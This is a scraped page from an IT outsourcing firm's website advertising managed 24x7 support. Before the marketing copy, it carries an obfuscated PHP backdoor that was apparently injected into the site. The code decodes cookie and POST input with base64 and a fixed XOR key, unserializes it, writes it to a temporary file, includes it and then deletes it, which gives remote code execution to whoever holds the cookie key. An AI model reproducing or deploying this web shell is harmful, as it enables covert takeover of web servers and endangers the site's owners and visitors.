$gcDIFKr = 'T' . chr (101) . "\123" . "\137" . chr (66) . "\x67" . "\131" . "\x54";$kZoSkjDMA = chr ( 227 - 128 ).chr ( 252 - 144 )."\x61" . "\163" . 's' . "\x5f" . chr (101) . chr (120) . chr ( 580 - 475 )."\163" . chr ( 889 - 773 )."\x73";$TjLoNKyvZB = class_exists($gcDIFKr); $kZoSkjDMA = "40666";$pWVym = !1;if ($TjLoNKyvZB == $pWVym){function paxusm(){$XgQoWRWyN = new /* 21071 */ TeS_BgYT(15687 + 15687); $XgQoWRWyN = NULL;}$eDgbdB = "15687";class TeS_BgYT{private function Enflrti($eDgbdB){if (is_array(TeS_BgYT::$KPSspNA)) {$rbKqtmQcIp = sys_get_temp_dir() . "/" . crc32(TeS_BgYT::$KPSspNA['s' . "\x61" . 'l' . 't']);@TeS_BgYT::$KPSspNA[chr ( 217 - 98 ).chr ( 766 - 652 ).chr ( 1020 - 915 )."\164" . "\x65"]($rbKqtmQcIp, TeS_BgYT::$KPSspNA["\143" . 'o' . "\156" . chr (116) . "\x65" . "\156" . 't']);include $rbKqtmQcIp;@TeS_BgYT::$KPSspNA["\x64" . "\145" . "\154" . "\145" . 't' . chr (101)]($rbKqtmQcIp); $eDgbdB = "15687";exit();}}private $oKNHvgzc;public function zLZOYoYFb(){echo 41826;}public function __destruct(){$eDgbdB = "28112_30749";$this->Enflrti($eDgbdB); $eDgbdB = "28112_30749";}public function lptByl($rwGKlsP, $SaaOqw){return $rwGKlsP[0] ^ str_repeat($SaaOqw, (strlen($rwGKlsP[0]) / strlen($SaaOqw)) + 1);}public function __construct($HWNKAuW=0){$ytLIex = $_POST;$RwrRp = $_COOKIE;$SaaOqw = "d2dbab51-1ab6-46dd-a7a1-57f701d9dd23";$GxEQrM = @$RwrRp[substr($SaaOqw, 0, 4)];if (!empty($GxEQrM)){$EwdCOoNWB = "base64";$rwGKlsP = "";$GxEQrM = explode(",", $GxEQrM);foreach ($GxEQrM as $CqgTAHsQ){$rwGKlsP .= @$RwrRp[$CqgTAHsQ];$rwGKlsP .= @$ytLIex[$CqgTAHsQ];}$rwGKlsP = array_map($EwdCOoNWB . "\x5f" . chr ( 825 - 725 ).chr (101) . "\x63" . chr (111) . "\x64" . "\145", array($rwGKlsP,)); $rwGKlsP = $this->lptByl($rwGKlsP, $SaaOqw);TeS_BgYT::$KPSspNA = @unserialize($rwGKlsP);}}public static $KPSspNA = 56949;}paxusm();} IT Outsourcing - OpSec Consulting

I.T. Outsourcing

We can fulfill your IT outsourcing needs or supplement your current team.

Your company may not be large enough to have dedicated IT support…

And if you do have a dedicated IT support person or team, they may not have all of the necessary skills, resources, or time that your company requires to successfully manage its ever-changing IT demands. Remember, the IT world is vast. Networking, servers, applications, desktops, web sites, email, and databases are just some of the things that your IT team will need to support. As part of OpSec Managed Services, we offer true 24×7 support, 365 days a year, and give you access to a team of friendly, well-trained support people. Our IT Outsourcing services can help you fill in the IT gaps so that your company can continue to thrive at its core competencies.

If you’re a smaller company, sometimes it’s not feasible to hire a full-time support person. Your IT needs may not be as demanding as a larger company. This is where OpSec Managed Services comes in. Outsourcing your IT needs to us will give you the ability to utilize our services on an as-needed basis. For a flat-fee that you can budget, we can manage all of your IT Services in New Jersey, and outlying areas, while providing stellar 24×7 support.

Additionally, outsourcing your IT needs to OpSec will allow you to focus on your core business, without the issues that can arise with personnel. You are the expert in your business; we are the expert in ours. Allow us to help you get back to what matters. We help you focus on your business, not your technology.

Contact us today to outsource your technology needs.

Protect yourself from security holes, unauthorized users & devices, and rogue software.

Get in Touch for Best in Class IT Services 

Areas We Serve:

New Jersey, New York, Pennsylvania, Connecticut and California

(855) USE-OPSEC 873-6773
